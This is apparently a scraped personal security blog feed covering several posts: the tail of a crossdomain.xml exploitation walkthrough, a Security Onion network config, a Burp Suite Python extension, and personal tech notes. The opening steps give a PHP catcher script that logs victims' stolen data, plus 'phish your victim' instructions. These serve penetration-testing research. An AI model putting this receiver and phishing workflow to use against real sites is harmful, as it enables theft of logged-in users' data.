<div style="line-height: 1.15;">
<span style="background-color: white; color: #222222; font-family: "arial"; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
6) Create and save the catcher file. This php file takes the entire data portion of the incoming HTTP message and writes it to a file in /tmp. You can get a lot fancier with this, such as creating a separate file per victim, or by parsing the file within php and only writing the relevant information to disk.<br />
<br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;">vi /var/www/catcher.php
<?php
$data = file_get_contents("php://input");
$ret = file_put_contents('/tmp/thanks_for_sharing.txt', $data, FILE_APPEND | LOCK_EX);
if($ret === false) {
die('Error writing to file');
}
else {
echo "$ret bytes written to file";
}
?>
</pre>
</div>
<br /></div>
7) Install PHP if it is not already installed:<br />
<br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;"> apt-get install php5
</pre>
</div>
<br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
8) Set your web server to support SSL.<br />
<br />
<i>*This step is optional, but if your flash object is communicating with a HTTPS site, and the secure="false" attribute is not set, your flash object needs to have been loaded from a HTTPS site. </i><br />
<br />
The two lines below show you <a href="http://charles.lescampeurs.org/2012/01/14/ubuntu-11-10-setting-up-apache2-and-ssl-with-self-signed-certificate">how to make a self-signed cert</a>. For a more realistic POC, you would want to purchase a valid SSL certificate so your victim user does not get any SSL errors.</div>
</div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: "arial"; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">
</span>
<!-- HTML generated using hilite.me --><br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;"> <span style="line-height: 125%;">make-ssl-cert generate-default-snakeoil --force-overwrite</span></pre>
<pre style="line-height: 125%; margin: 0;"><span style="line-height: 125%;"> a2enmod ssl</span></pre>
<pre style="line-height: 125%; margin: 0;"> a2ensite default-ssl
</pre>
</div>
<br /></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
9) Start [or restart] your web server<br />
<div style="line-height: 1.15;">
<span style="background-color: white; color: #222222; font-family: "arial"; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
</div>
<div style="background-color: #f8f8f8; border: solid gray; line-height: 1.15; overflow: auto; padding: 0.2em 0.8em; width: auto;">
<pre style="line-height: 16.25px;"> /etc/init.d/apache2 restart</pre>
</div>
</div>
<br />
10) Phish your victim to your site, <span style="color: red;">www.malicious-site.com/crossdomain/xdx.html</span><br />
<br />
11) Hope the victim is currently logged in to the <span style="color: blue;">www.secret-site.com</span><br />
<br />
12) Collect and analyze your stolen data:<br />
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<div style="background-color: #f8f8f8; border: solid gray; overflow: auto; padding: 0.2em 0.8em; width: auto;">
<pre style="line-height: 16.25px;"> cat /tmp/thanks_for_sharing.txt</pre>
</div>
</div>
<span style="background-color: white; color: #222222; font-family: "arial"; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"></span>
<br />
<br />
<h2>
Related Work: </h2>
<div>
<ul>
<li><a href="http://sethsec.blogspot.com/2014/03/exploiting-insecure-crossdomain.html">Exploiting insecure crossdomain policies to bypass anti-CSRF tokens</a></li>
<li><a href="http://sethsec.blogspot.com/2014/07/crossdomain-bing.html">Real world exploitation of a misconfigured crossdomain.xml - Bing.com</a></li>
<li><a href="http://sethsec.blogspot.com/2014/07/cve-2014-2227.html">AirVision Controller v2.1.3 - Overly Permissive default crossdomain.xml</a></li>
<li><a href="http://sethsec.blogspot.com/2014/10/bsidesdc-2014.html">BSides DC 2014 - SWF Seeking Lazy Admin for Cross-Domain Action</a></li>
</ul>
</div>
<div>
<h1 dir="ltr" style="line-height: 1.15; margin-bottom: 6pt; margin-top: 24pt;">
<span style="font-weight: normal;"><span style="background-color: white; color: #222222; font-family: "arial"; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"></span></span></h1>
</div>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com2tag:blogger.com,1999:blog-5890567984672491244.post-68402678584388779052014-01-28T23:06:00.001-05:002014-12-30T10:28:35.273-05:00Configuring a bridged promisc interface in Security OnionA few months ago I configured an all in one (server and sensor) Security Onion VM on my ESXi box. It took a while, but I finally found a good box that I could use for a physical sensor. I bought this <a href="http://barracuda.optrics.com/products/351-barracuda-ethernet-tap.aspx">Barracuda ethernet TAP</a> back around 2007-9, and while it worked great, after I moved to my house, it has literally been collecting dust in my basement for years. Lucky for me, it still works! <br />
<br />
This is a non aggregating TAP, which means I have two "output" cables coming from the TAP to my IDS. On the physical server, I installed Security Onion as a sensor only, and the TAP interfaces ended up being eth0 and eth2 (eth1 is the mgmt. interface).<br />
<br />
I quickly realized that I only knew how to bond two interfaces together on CentOS/RedHat. It took a few hours of googling and trial and error, but I finally got eth0 and eth2 bonded/bridged together. <br />
<br />
Aside from the Security Onion install, and configuring the interfaces (as shows below), the only other thing I needed to do was to install the <em>bridge-utils</em> package. Until I did that, even though my interfaces file was configured properly, the br0 interface would not come up. <br />
<br />
I don't want to lose the config that ended up working, so here is the final config for Ubuntu/Xubuntu:<br />
<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f0f0f0; border-width: .1em .1em .1em .1em; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #c65d09; font-weight: bold;">seth@sensor-dell:~$</span> uname -a
<span style="color: #888888;">Linux sensor-dell 3.2.0-58-generic #88-Ubuntu SMP Tue Dec 3 17:37:58 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux</span>
<span style="color: #c65d09; font-weight: bold;">seth@sensor-dell:~$</span> <span style="color: #007020;">history</span> | grep bridge-utils
<span style="color: #888888;"> 67 sudo apt-get install bridge-utils</span>
<span style="color: #c65d09; font-weight: bold;">seth@sensor-dell:~$</span> cat /etc/network/interfaces
<span style="color: #888888;"># This configuration was created by the Security Onion setup script. The original network</span>
<span style="color: #888888;"># interface configuration file was backed up to /etc/networking/interfaces.bak.</span>
<span style="color: #888888;"># This file describes the network interfaces available on your system</span>
<span style="color: #888888;"># and how to activate them. For more information, see interfaces(5).</span>
<span style="color: #888888;"># loopback network interface</span>
<span style="color: #888888;">auto lo</span>
<span style="color: #888888;">iface lo inet loopback</span>
<span style="color: #888888;"># Management network interface</span>
<span style="color: #888888;">auto eth1</span>
<span style="color: #888888;">iface eth1 inet static</span>
<span style="color: #888888;"> address 192.168.0.202</span>
<span style="color: #888888;"> gateway 192.168.0.1</span>
<span style="color: #888888;"> netmask 255.255.255.0</span>
<span style="color: #888888;"> dns-nameservers 8.8.8.8 8.8.4.4</span>
<span style="color: #888888;">auto eth0</span>
<span style="color: #888888;">iface eth0 inet manual</span>
<span style="color: #888888;"> up ip link set eth0 promisc on arp off up</span>
<span style="color: #888888;"> down ip link set eth0 promisc off down</span>
<span style="color: #888888;"> post-up ethtool -G eth0 rx ; for i in rx tx sg tso ufo gso gro lro; do ethtool -K eth0 $i off; done</span>
<span style="color: #888888;"> post-up echo 1 > /proc/sys/net/ipv6/conf/eth0/disable_ipv6</span>
<span style="color: #888888;">auto eth2</span>
<span style="color: #888888;">iface eth2 inet manual</span>
<span style="color: #888888;"> up ip link set eth2 promisc on arp off up</span>
<span style="color: #888888;"> down ip link set eth2 promisc off down</span>
<span style="color: #888888;"> post-up ethtool -G eth2 rx ; for i in rx tx sg tso ufo gso gro lro; do ethtool -K eth2 $i off; done</span>
<span style="color: #888888;"> post-up echo 1 > /proc/sys/net/ipv6/conf/eth2/disable_ipv6</span>
<span style="color: #888888;">auto br0</span>
<span style="color: #888888;">iface br0 inet manual</span>
<span style="color: #888888;"> bridge_ports eth0 eth2</span>
<span style="color: #888888;"> up ip link set br0 promisc on arp off up</span>
<span style="color: #888888;"> down ip link set br0 promisc off down</span>
<span style="color: #888888;"> post-up ethtool -G br0 rx ; for i in rx tx sg tso ufo gso gro lro; do ethtool -K br0 $i off; done</span>
<span style="color: #888888;"> post-up echo 1 > /proc/sys/net/ipv6/conf/br0/disable_ipv6</span>
</pre>
</div>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com2tag:blogger.com,1999:blog-5890567984672491244.post-31062641036812828082014-01-14T11:33:00.000-05:002014-12-30T10:31:27.696-05:00Writing and Debugging BurpSuite Extensions in Python<span style="font-family: Arial, Helvetica, sans-serif;">When I first started with Burp extensions over a year ago, I used the <a href="https://github.com/zynga/hiccup">hiccup framework</a> to develop my plugins. Hiccup had a way of monitoring my custom "plugin" for changes each time it performed an action. As a result, it appeared that any changes I made to a plugin took effect in Burp instantly. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Well, when Burp Extender API 1.5 came out, while it greatly improved what could be done with Burp extensions, it also broke projects like Hiccup. Not wanting to be dependent on another non PortSwigger API, I decided to spend whatever time I needed to learn how to interface with the Burp API directly. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">As I began, one frustrating thing I realized was that I had to reload my extension each time I made even the smallest change. This process takes some time, and because I am using Jython, it sucks some memory each time the extension is reloaded. I finally gave in and <a href="http://forum.portswigger.net/thread/1024/developing-debugging-python-extensions">asked </a></span><span style="font-family: Arial;"><a href="http://forum.portswigger.net/thread/1024/developing-debugging-python-extensions">on the Burp Suite forum</a> if anyone had a better way of writing and/or debugging Burp Extensions in Python. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">It turns out someone did. <a href="http://forum.portswigger.net/user/857">elespike</a> figured out that if you move your new functionality to a second file, you could import it once, and then reload it as frequently as you like. His guidance is in the thread listed above, but I thought it would be helpful to blog my entire solution. Also, after he pointed me in the direction of the reload, I went back to look at hiccup, and that is in fact what what chair6 was doing to make hiccup reload the plugin. </span><br />
<span style="font-family: Arial;"></span><br />
<span style="font-family: Arial;">And it is <strong><span style="font-size: large;">WAY BETTER.</span></strong> It saves a ton of time. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">So, with that intro, I wanted to document what I did. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><u>Step 1</u></strong></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />In Burp >> Extensions >> Options, I set my "<em>Folder for loading modules (optional)</em>" to c:\python\lib</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><strong><u>Step 2</u></strong><br />
<strong><u></u></strong><br />
<span style="font-family: Arial;">I then created my Burp Extension file. Where I would normally include all of my extension logic in this file, I instead moved all of my custom functions to another file (shown in step 3):</span><br />
<!-- HTML generated using hilite.me --></span><br />
<div style="background: #f0f0f0; border-width: .1em .1em .1em .1em; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: #007020; font-weight: bold;">from</span> <span style="color: #0e84b5; font-weight: bold;">burp</span> <span style="color: #007020; font-weight: bold;">import</span> IBurpExtender
<span style="color: #007020; font-weight: bold;">from</span> <span style="color: #0e84b5; font-weight: bold;">burp</span> <span style="color: #007020; font-weight: bold;">import</span> IContextMenuFactory
<span style="color: #007020; font-weight: bold;">from</span> <span style="color: #0e84b5; font-weight: bold;">burp</span> <span style="color: #007020; font-weight: bold;">import</span> IExtensionHelpers
<span style="color: #007020; font-weight: bold;">from</span> <span style="color: #0e84b5; font-weight: bold;">javax.swing</span> <span style="color: #007020; font-weight: bold;">import</span> JMenuItem
<span style="color: #007020; font-weight: bold;">from</span> <span style="color: #0e84b5; font-weight: bold;">java.awt.event</span> <span style="color: #007020; font-weight: bold;">import</span> ActionListener
<span style="color: #007020; font-weight: bold;">from</span> <span style="color: #0e84b5; font-weight: bold;">java.awt.event</span> <span style="color: #007020; font-weight: bold;">import</span> ActionEvent
<span style="color: #007020; font-weight: bold;">from</span> <span style="color: #0e84b5; font-weight: bold;">java.awt.event</span> <span style="color: #007020; font-weight: bold;">import</span> KeyEvent
<span style="color: #007020; font-weight: bold;">import</span> <span style="color: #0e84b5; font-weight: bold;">traceback</span>
<span style="color: #60a0b0; font-style: italic;"># Burp is configured to look for python modules in c:\python27\lib. </span>
<span style="color: #60a0b0; font-style: italic;"># If the following file exists in that directory, it will be loaded</span>
<span style="color: #007020; font-weight: bold;">import</span> <span style="color: #0e84b5; font-weight: bold;">UniqueParamValues</span>
<span style="color: #007020; font-weight: bold;">class</span> <span style="color: #0e84b5; font-weight: bold;">BurpExtender</span>(IBurpExtender, IContextMenuFactory, ActionListener):
<span style="color: #007020; font-weight: bold;">def</span> <span style="color: #06287e;">__init__</span>(<span style="color: #007020;">self</span>):
<span style="color: #007020;">self</span><span style="color: #666666;">.</span>menuItem <span style="color: #666666;">=</span> JMenuItem(<span style="color: #4070a0;">'Print Unique Parameter Values'</span>)
<span style="color: #007020;">self</span><span style="color: #666666;">.</span>menuItem<span style="color: #666666;">.</span>addActionListener(<span style="color: #007020;">self</span>)
<span style="color: #007020; font-weight: bold;">def</span> <span style="color: #06287e;">actionPerformed</span>(<span style="color: #007020;">self</span>, actionEvent):
<span style="color: #007020; font-weight: bold;">print</span> <span style="color: #4070a0;">"*"</span> <span style="color: #666666;">*</span> <span style="color: #40a070;">60</span>
<span style="color: #60a0b0; font-style: italic;"># Here is the reload. You can place this anywhere you wantm but you will </span>
<span style="color: #60a0b0; font-style: italic;"># most likely want to place this within an action (request recieved, menu</span>
<span style="color: #60a0b0; font-style: italic;"># item clicked, scanner started, etc). </span>
<span style="color: #007020;">reload</span>(UniqueParamValues)
<span style="color: #60a0b0; font-style: italic;"># This try statement, and the traceback included in the except, are what</span>
<span style="color: #60a0b0; font-style: italic;"># allowed me to finally get the trace information I needed to debug my </span>
<span style="color: #60a0b0; font-style: italic;"># issues. I highly recommned including these when developing Burp </span>
<span style="color: #60a0b0; font-style: italic;"># Extensions</span>
<span style="color: #007020; font-weight: bold;">try</span>:
UniqueParamValues<span style="color: #666666;">.</span>getUniqueParams(<span style="color: #007020;">self</span>)
<span style="color: #007020; font-weight: bold;">except</span>:
tb <span style="color: #666666;">=</span> traceback<span style="color: #666666;">.</span>format_exc()
<span style="color: #007020; font-weight: bold;">print</span> tb
<span style="color: #60a0b0; font-style: italic;"># implement IBurpExtender</span>
<span style="color: #007020; font-weight: bold;">def</span> <span style="color: #06287e;">registerExtenderCallbacks</span>(<span style="color: #007020;">self</span>, callbacks):
<span style="color: #60a0b0; font-style: italic;"># keep a reference to our callbacks object (Burp Extensibility Feature)</span>
<span style="color: #007020;">self</span><span style="color: #666666;">.</span>_callbacks <span style="color: #666666;">=</span> callbacks
<span style="color: #007020;">self</span><span style="color: #666666;">.</span>_helpers <span style="color: #666666;">=</span> callbacks<span style="color: #666666;">.</span>getHelpers()
<span style="color: #60a0b0; font-style: italic;"># set our extension name</span>
callbacks<span style="color: #666666;">.</span>setExtensionName(<span style="color: #4070a0;">"Unique Parameter Values"</span>)
callbacks<span style="color: #666666;">.</span>registerContextMenuFactory(<span style="color: #007020;">self</span>)
<span style="color: #007020; font-weight: bold;">return</span>
<span style="color: #007020; font-weight: bold;">def</span> <span style="color: #06287e;">createMenuItems</span>(<span style="color: #007020;">self</span>, ctxMenuInvocation):
<span style="color: #007020;">self</span><span style="color: #666666;">.</span>ctxMenuInvocation <span style="color: #666666;">=</span> ctxMenuInvocation
<span style="color: #007020; font-weight: bold;">return</span> [<span style="color: #007020;">self</span><span style="color: #666666;">.</span>menuItem]
</span></pre>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;">
<span style="font-family: Arial;"> </span><br />
<span style="font-family: Arial;"> </span>
<br /><strong><u>Step 3</u></strong></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-family: Arial, Helvetica, sans-serif;">And finally, I created a file that would contain the customized functions needed in my extension (UniqueParamValues.py), and dropped that file in c:\python\lib directory. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> </span></span><br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f0f0f0; border-width: .1em .1em .1em .1em; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #007020; font-weight: bold;">def</span> <span style="color: #06287e;">getUniqueParams</span>(<span style="color: #007020;">self</span>):
<span style="color: #60a0b0; font-style: italic;"># Initialize list</span>
parameter_array <span style="color: #666666;">=</span> []
parameter_string_array <span style="color: #666666;">=</span> []
messages <span style="color: #666666;">=</span> <span style="color: #007020;">self</span><span style="color: #666666;">.</span>ctxMenuInvocation<span style="color: #666666;">.</span>getSelectedMessages()
<span style="color: #60a0b0; font-style: italic;"># This for loop iterates through all of the selected messages pulling out </span>
<span style="color: #60a0b0; font-style: italic;"># everything Burp considers a parameter (even cookies), and putting all of </span>
<span style="color: #60a0b0; font-style: italic;"># the parameters in an array</span>
<span style="color: #007020; font-weight: bold;">for</span> m <span style="color: #007020; font-weight: bold;">in</span> messages:
request_byte_array<span style="color: #666666;">=</span>m<span style="color: #666666;">.</span>getRequest()
requestInfo <span style="color: #666666;">=</span> <span style="color: #007020;">self</span><span style="color: #666666;">.</span>_helpers<span style="color: #666666;">.</span>analyzeRequest(request_byte_array)
parameters <span style="color: #666666;">=</span> requestInfo<span style="color: #666666;">.</span>getParameters()
parameter_array <span style="color: #666666;">=</span> parameter_array <span style="color: #666666;">+</span> parameters
<span style="color: #60a0b0; font-style: italic;"># This for loop iterates through each paramter and creates a string with the </span>
<span style="color: #60a0b0; font-style: italic;"># paramname=paramvalue, so that they can be compared and sorted later. </span>
<span style="color: #007020; font-weight: bold;">for</span> p <span style="color: #007020; font-weight: bold;">in</span> parameter_array:
param_string <span style="color: #666666;">=</span> p<span style="color: #666666;">.</span>getName() <span style="color: #666666;">+</span> <span style="color: #4070a0;">"="</span> <span style="color: #666666;">+</span> p<span style="color: #666666;">.</span>getValue()
<span style="color: #60a0b0; font-style: italic;">#print "Param String:", param_string</span>
parameter_string_array<span style="color: #666666;">.</span>append(param_string)
<span style="color: #60a0b0; font-style: italic;"># After the for loop is finished, then uniquify and sort the parameters -- The main purpose of the extension</span>
unique_parameters <span style="color: #666666;">=</span> <span style="color: #007020;">sorted</span>(uniqify(<span style="color: #007020;">self</span>,parameter_string_array))
<span style="color: #007020; font-weight: bold;">print</span> <span style="color: #4070a0;">"************************************************************"</span>
<span style="color: #007020; font-weight: bold;">print</span> <span style="color: #4070a0;">"******************** Unique Paramters **********************"</span>
<span style="color: #007020; font-weight: bold;">print</span> <span style="color: #4070a0;">"************************************************************"</span>
<span style="color: #007020; font-weight: bold;">print</span>
<span style="color: #007020; font-weight: bold;">print</span> <span style="color: #4070a0;">"Number of Parameters:"</span>, <span style="color: #007020;">len</span>(parameter_string_array)
<span style="color: #007020; font-weight: bold;">print</span> <span style="color: #4070a0;">"Number of Unique Parameters :"</span>, <span style="color: #007020;">len</span>(unique_parameters)
<span style="color: #007020; font-weight: bold;">print</span>
param_dict <span style="color: #666666;">=</span> {}
<span style="color: #007020; font-weight: bold;">for</span> unique_param <span style="color: #007020; font-weight: bold;">in</span> unique_parameters:
<span style="color: #60a0b0; font-style: italic;">#print "Param: %s" % (unique_param))</span>
param_name <span style="color: #666666;">=</span> unique_param<span style="color: #666666;">.</span>split(<span style="color: #4070a0;">"="</span>)[<span style="color: #40a070;">0</span>]
param_value <span style="color: #666666;">=</span> unique_param<span style="color: #666666;">.</span>split(<span style="color: #4070a0;">"="</span>)[<span style="color: #40a070;">1</span>]
<span style="color: #60a0b0; font-style: italic;">#This if statement creates a dictionary, but unlike a normal dictionary, the value of each key is a list.</span>
<span style="color: #60a0b0; font-style: italic;">#This is so that I can use the append function. </span>
<span style="color: #60a0b0; font-style: italic;">#The key is the parameter name</span>
<span style="color: #60a0b0; font-style: italic;">#The value is a list of all of unique the seen parameter values</span>
<span style="color: #007020; font-weight: bold;">if</span> <span style="color: #007020; font-weight: bold;">not</span> param_name <span style="color: #007020; font-weight: bold;">in</span> param_dict:
param_dict[param_name] <span style="color: #666666;">=</span> []
param_dict[param_name]<span style="color: #666666;">.</span>append(param_value)
<span style="color: #007020; font-weight: bold;">for</span> key, value <span style="color: #007020; font-weight: bold;">in</span> param_dict<span style="color: #666666;">.</span>iteritems():
<span style="color: #007020; font-weight: bold;">print</span>(<span style="color: #007020;">len</span>(key) <span style="color: #666666;">*</span> <span style="color: #4070a0;">"-"</span> <span style="color: #666666;">+</span> <span style="color: #4070a0;">"----"</span>)
<span style="color: #007020; font-weight: bold;">print</span>(<span style="color: #4070a0;">"| </span><span style="color: #70a0d0; font-style: italic;">%s</span><span style="color: #4070a0;"> |"</span> <span style="color: #666666;">%</span> (key))
<span style="color: #007020; font-weight: bold;">print</span> (<span style="color: #007020;">len</span>(key) <span style="color: #666666;">*</span> <span style="color: #4070a0;">"-"</span> <span style="color: #666666;">+</span> <span style="color: #4070a0;">"----"</span>)
<span style="color: #007020; font-weight: bold;">for</span> item <span style="color: #007020; font-weight: bold;">in</span> value:
<span style="color: #007020; font-weight: bold;">print</span>(item)
<span style="color: #007020; font-weight: bold;">print</span>(<span style="color: #4070a0;">"</span><span style="color: #4070a0; font-weight: bold;">\n\n\n\n</span><span style="color: #4070a0;">"</span>)
<span style="color: #007020; font-weight: bold;">def</span> <span style="color: #06287e;">uniqify</span>(<span style="color: #007020;">self</span>, parameter_string_array):
<span style="color: #60a0b0; font-style: italic;"># not order preserving</span>
<span style="color: #007020;">set</span> <span style="color: #666666;">=</span> {}
<span style="color: #007020;">map</span>(<span style="color: #007020;">set</span><span style="color: #666666;">.</span>__setitem__, parameter_string_array, [])
<span style="color: #007020; font-weight: bold;">return</span> <span style="color: #007020;">set</span><span style="color: #666666;">.</span>keys()
</pre>
</div>
<span style="font-family: Arial;">As you can see in the snippet above, this file does not require any additional imports. You just define the definitions, receive the arguments, process, and then optionally return the result to the caller. This extension is far from complete, and is the first python I have written in a year, so please don't judge me :). </span><br />
<span style="font-family: Arial;"><span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-family: Arial, Helvetica, sans-serif;"></span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-family: Arial, Helvetica, sans-serif;">Regardless, I wanted to put it up here as an example on how to quickly develop and debug a Burp Extension with Python. </span></span><br />
<br />
If you are curious, at this point, the extension spits out a table in stdout that looks like this:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">************************************************************<br />******************** Unique Paramters **********************<br />************************************************************</span><br />
<span style="font-family: "Courier New", Courier, monospace;"></span><br />
<span style="font-family: "Courier New", Courier, monospace;">Number of Parameters: 40<br />Number of Unique Parameters: 12</span><br />
<span style="font-family: "Courier New", Courier, monospace;">--------------<br />| csrf_token |<br />--------------<br />null<br />------------<br />| board_id |<br />------------<br />2<br />----------<br />| __utmb |<br />----------<br />194279098.1.10.1389713652<br />----------<br />| __utmc |<br />----------<br />194279098<br />----------<br />| __utmz |<br />----------<br />194279098.1389713652.1.1.utmcsr<br />----------<br />| __utma |<br />----------<br />194279098.364032451.1389713652.1389713652.1389713652.1<br />--------<br />| page |<br />--------<br />2<br />3<br />4<br />5<br />6</span><br />
<br />
My goal is to eventually create a window in Burp that will contain this information, as well as counts for each parameter value. </span>Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-70589002857589592002014-01-13T15:37:00.002-05:002014-01-13T15:39:36.951-05:00Re-launch - A focus on Web Application Pen Testing, Burp Extensions, etc<span style="font-family: "Arial","sans-serif";">It has been quite a while
since my last blog post here. Not that I have ever really blogged much, but
in 2010, I officially switched from a world filled with enterprise firewalls
and intrusion detection systems, to one filled with Web Applications (and other
types of applications). </span><o:p></o:p><br />
<br />
<span style="font-family: "Arial","sans-serif";">On one hand, for someone who
likes to learn, Web Application Penenetration Testing is perfect: There are so many
languages, frameworks, best practices, and common mistakes to understand, that as a tester, you will never run out of things to learn. Of course, that also means that
you will never come close to being able to learning it all. Left
unmanaged, this can be a source of frustration and despair. </span><o:p></o:p><br />
<br />
<span style="font-family: "Arial","sans-serif";"><span style="font-family: "Arial","sans-serif";">The main point of this blog re-launch, is that it has been far too long since I have written any code. I'd like to document the mistakes I make, and the lessons I am bound to learn, as I jump back into things. </span></span><br />
<span style="font-family: "Arial","sans-serif";"></span><br />
<span style="font-family: "Arial","sans-serif";">I
mainly test applications from a Windows OS, so those thousands of hours of BASH
scripting experience from my past are just sitting in my brain as memories. I
was just starting to become functional in Python also, when I essentially
abandoned that as well. I have found a few things to automate over the last few
years, but to be honest, most times I think of something related to application
testing that I can automate in Python, I realize that Portswigger's Burp Suite
already does that. I can't tell you how many times this has happened. </span><o:p></o:p><br />
<br />
<span style="font-family: "Arial","sans-serif";">Of course, the problem with
relying on a tool to do something for you is that if you need it to do
something slightly differently, you are stuck. This is where the Burp Extension
API comes into play.</span><o:p></o:p><br />
<br />
<span style="font-family: "Arial","sans-serif";">Recently, I have done a
number of assessments on custom applications (Mostly thick clients written in
Java, C#, etc), that use web services to communicate with the server. While
these applications use HTTP(s), and can be intercepted with Burp, their implementations
are unique and it becomes difficult to analyze the requests with the default
Burp functionality. </span><o:p></o:p><br />
<br />
<span style="font-family: "Arial","sans-serif";">This is of course, the perfect opportunity
for me to extend Burp Suite to make it do things that only I need it to do,
while at the same time, an opportunity for me to dust off my
scripting/programming skills.</span><br />
<span style="font-family: "Arial","sans-serif";"></span><br />
<span style="font-family: "Arial","sans-serif";">The next few posts at least, will contain Burp Extension related info. They will hopefully show me improving from noob to moderatly functional. We'll see... </span>Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-7159442416873556252009-10-27T12:11:00.003-04:002009-10-27T12:19:48.392-04:00Use dropbox to collect wedding photos (or any other group photos) with friends and familyAfter my wedding, I searched for hours trying to find the easiest way for all my friends and family to send me their digital photos. An FTP server would have worked, but would have been slightly more intimidating to the non-technical folk. I decided that a shared dropbox account was the perfect solution, and it worked out even better than I could have imagined. I received 1900 unique pictures in 2 weeks!!<br /><br /><strong>I created a new account, and sent the following email to everyone who attended:<br /></strong><br />Thanks so much for making our special day an amazing one! Now that it is over we would love to get everyone's perspective. So, we would appreciate it if you could drop your photos in our dropbox (instructions below).<br /><br />This is an account that we will all share. This means that you can all check back in a week and download as many pictures as you like, and it also means that you can potentially delete all the pictures everyone else has uploaded… so be careful!<br /><br /><strong>How to upload pictures:</strong><br /><br /><ol><li>Browse to this website: <a class="http" href="http://www.getdropbox.com/">http://www.getdropbox.com/</a> </li><li>Log in using this username/password combo (login is in upper right corner):<br /> Username: <enter><br /> Password: <enter> </li><li>Once you get logged in click on the word Photos </li><li>If you would like us to know which pictures are yours, create a folder with your name<br /> ie: Seth's Pics </li><li>Click on the folder you just created </li><li>Click the UPLOAD BUTTON<br /></li></ol><strong>There are three ways to upload pictures:<br /><br /></strong><strong></strong><br /><p>Use the mass upload feature<br /></p><ul><li>This is by far the easiest. </li><li>Click the blue button that says "Choose Files" </li><li>Hold shift and can use the arrow keys to select up to 50 pictures at a time and select "open" </li><li>Then click submit to upload them to the site!<br /></li></ul>If that doesn’t work, you can try the “Basic Uploader”<br /><ul><li> This one is much slower because you have to select one file at a time like in most email clients. If the first option doesn’t work, I recommend going to the third. </li></ul><p>Install the software package on your computer </p><ul><li>Hit cancel, and then goto the “Install” link on the top right of the page. </li><li>Install the software package using the same username and password from above </li><li>This will create a “sync” folder on your computer where you can just copy all of the files from the original folder to this sync folder. Within minutes they will all upload to the server automatically! </li><li>*** This means that every picture someone else uploads will also automatically sync to your computer, so be mindful that this can eat up all of your bandwidth and/or hard drive space. ***<br /></li></ul><p>Thanks again! </p>Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com1tag:blogger.com,1999:blog-5890567984672491244.post-42997789342658613072008-06-11T20:55:00.005-04:002008-06-11T22:19:46.587-04:00Mysql fixI don't believe this post will be very useful to anyone else, but I want to record it anyway. I noticed a few weeks ago that my <span class="blsp-spelling-error" id="SPELLING_ERROR_0">drupal</span> installation was complaining that the watchdog table had crashed. With my limited understanding of <span class="blsp-spelling-error" id="SPELLING_ERROR_1">mysql</span>, I <span class="blsp-spelling-corrected" id="SPELLING_ERROR_2">didn't</span> event know that a table *could* crash. Everything else on the site looked fine to the anonymous user so I just ignored it.<br /><br /><br /><br />That brings me to today. I found this interesting script online that will dump all of my <span class="blsp-spelling-error" id="SPELLING_ERROR_3">mysql</span> databases every hour to another <span class="blsp-spelling-corrected" id="SPELLING_ERROR_4">file system</span>. I figured I would give a shot. I entered my root db password and the <span class="blsp-spelling-error" id="SPELLING_ERROR_5">dst</span> directory and let her rip. I got a few errors right away:<br /><br /><br /><br /><span style="font-family:courier new;">[root@www storage]# <strong><span class="blsp-spelling-error" id="SPELLING_ERROR_6">mysql</span>-backup.sh</strong> </span><br /><br /><span style="font-family:courier new;"><span class="blsp-spelling-error" 